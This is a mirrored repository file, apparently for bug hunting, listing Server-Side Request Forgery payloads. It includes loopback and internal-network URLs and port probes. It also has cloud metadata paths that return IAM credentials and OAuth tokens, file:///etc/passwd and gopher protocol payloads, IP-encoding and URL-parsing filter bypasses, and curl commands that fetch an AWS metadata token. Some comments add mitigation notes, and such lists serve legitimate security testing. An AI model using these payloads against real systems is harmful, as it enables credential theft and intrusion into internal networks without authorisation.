mirror of
https://github.com/0x5t4l1n/hunting.git
synced 2026-05-26 19:36:33 +00:00
ab9c127df3
Co-authored-by: Stalin-143 <161853795+Stalin-143@users.noreply.github.com>
# SSRF (Server-Side Request Forgery) Payloads
|
|
|
|
# Basic SSRF
|
|
http://127.0.0.1
|
|
http://localhost
|
|
http://0.0.0.0
|
|
http://[::1]
|
|
http://[::]
|
|
|
|
# Port scanning
|
|
http://127.0.0.1:22
|
|
http://127.0.0.1:80
|
|
http://127.0.0.1:443
|
|
http://127.0.0.1:3306
|
|
http://127.0.0.1:5432
|
|
http://127.0.0.1:6379
|
|
http://127.0.0.1:8080
|
|
http://127.0.0.1:27017
|
|
|
|
# Cloud metadata endpoints
|
|
# AWS (IMDSv1-style GET paths; an instance that enforces IMDSv2 rejects these without a session token)
|
|
http://169.254.169.254/latest/meta-data/
|
|
http://169.254.169.254/latest/meta-data/iam/security-credentials/
|
|
http://169.254.169.254/latest/user-data/
|
|
|
|
# Google Cloud (the v1 endpoints are only answered when the request carries the "Metadata-Flavor: Google" header)
|
|
http://metadata.google.internal/computeMetadata/v1/
|
|
http://metadata.google.internal/computeMetadata/v1/instance/
|
|
http://metadata.google.internal/computeMetadata/v1/instance/service-accounts/default/token
|
|
|
|
# Azure (IMDS is only answered when the request carries the "Metadata: true" header)
|
|
http://169.254.169.254/metadata/instance?api-version=2021-02-01
|
|
http://169.254.169.254/metadata/identity/oauth2/token?api-version=2018-02-01&resource=https://management.azure.com/
|
|
|
|
# Digital Ocean
|
|
http://169.254.169.254/metadata/v1/
|
|
http://169.254.169.254/metadata/v1/id
|
|
|
|
# Internal network scanning
|
|
http://192.168.0.1
|
|
http://192.168.1.1
|
|
http://10.0.0.1
|
|
http://172.16.0.1
|
|
|
|
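# Protocol handlers (non-HTTP schemes; a fetcher that allow-lists only http and https rejects every entry in this section)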
|
|
file:///etc/passwd
|
|
file:///c:/windows/win.ini
|
|
dict://127.0.0.1:11211/
|
|
gopher://127.0.0.1:6379/_INFO
|
|
ldap://127.0.0.1:389
|
|
tftp://127.0.0.1:69
|
|
|
|
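# Bypassing filters (alternative spellings of the same destination; they defeat string-matching deny-lists, not a check made on the resolved IP address at connect time)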
|
|
# Using decimal IP (2130706433 = 127.0.0.1, 3232235521 = 192.168.0.1)
|
|
http://2130706433
|
|
http://3232235521
|
|
|
|
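# Using octal IP (0177 is octal for 127; the 0x7f.0x0.0x0.0x1 entry below is dotted hex and is repeated under "Using hex IP")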
|
|
http://0177.0.0.1
|
|
http://0x7f.0x0.0x0.0x1
|
|
|
|
# Using hex IP
|
|
http://0x7f000001
|
|
http://0x7f.0x0.0x0.0x1
|
|
|
|
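# DNS-based (a hostname whose record resolves to a loopback address; true DNS rebinding changes the answer between validation and fetch, so validate and connect to the same resolved IP)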
|
|
http://spoofed.burpcollaborator.net
|
|
|
|
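# URL encoding and userinfo (@) confusion (the validator and the HTTP client may disagree on which part is the host; parse with the same library that makes the request)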
|
|
http://127.0.0.1%23@example.com
|
|
http://example.com@127.0.0.1
|
|
http://127.0.0.1%00.example.com
|
|
http://127.0.0.1%2f%2f@example.com
|
|
|
|
# IPv6 localhost
|
|
http://[::1]
|
|
http://[0:0:0:0:0:0:0:1]
|
|
http://[0000:0000:0000:0000:0000:0000:0000:0001]
|
|
|
|
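# Redirect-based SSRF (an allowed host redirects to an internal address; mitigated by not following redirects or by re-validating every hop)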
|
|
http://redirect.example.com?url=http://127.0.0.1
|
|
|
|
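# AWS IMDSv2 (requires a session token obtained with a PUT request and a custom header, which a URL-only SSRF normally cannot send; enforcing IMDSv2 is the standard mitigation for the AWS paths listed earlier)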
|
|
TOKEN=`curl -X PUT "http://169.254.169.254/latest/api/token" -H "X-aws-ec2-metadata-token-ttl-seconds: 21600"`
|
|
curl -H "X-aws-ec2-metadata-token: $TOKEN" http://169.254.169.254/latest/meta-data/
|